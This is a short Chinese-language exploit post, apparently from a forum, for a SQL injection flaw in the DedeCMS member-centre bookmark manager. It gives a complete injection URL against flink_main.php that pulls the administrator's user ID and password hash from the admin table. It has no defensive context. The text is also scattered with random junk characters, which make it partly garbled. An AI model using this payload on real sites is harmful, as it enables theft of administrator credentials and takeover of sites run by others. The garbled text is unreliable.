DedeCMS会员中心SQL注射漏洞3 }! Y. S) ?5 x8 e
需要magic_quotes_gpc = Off
- r6 k$ t+ P. N" r4 _3 L会员登录后可以执行SQL语句查询数据库任意内容如管理员密码.* n0 p1 c/ X& R7 }# _9 q- h
8 g4 T- C- h5 A e N- @, M
DedeCMS会员中心书签管理SQL注射漏洞
. E7 `# e o1 t! E: l# x8 u2 ?5 E8 E成功利用该漏洞可获得管理员密码* @0 K5 m* Y9 [
5 X3 M+ F+ R6 Y7 X& @6 [) e
会员登录后可以执行SQL语句查询数据库任意内容如管理员密码 p: c1 B2 k' A' r7 c
# b) Y6 J3 k1 G4 H ]
http://bt/member/flink_main.php?dopost=update&aid=1&title=c4rp3nt3r&url=http://www.0x50sec.org',title=@`'`,url=(select concat(userid,0x3a,pwd) from `%23@__admin` limit 1),title='c4rp3nt3r* x7 l* \7 \$ O6 k+ s: ~: B$ n
|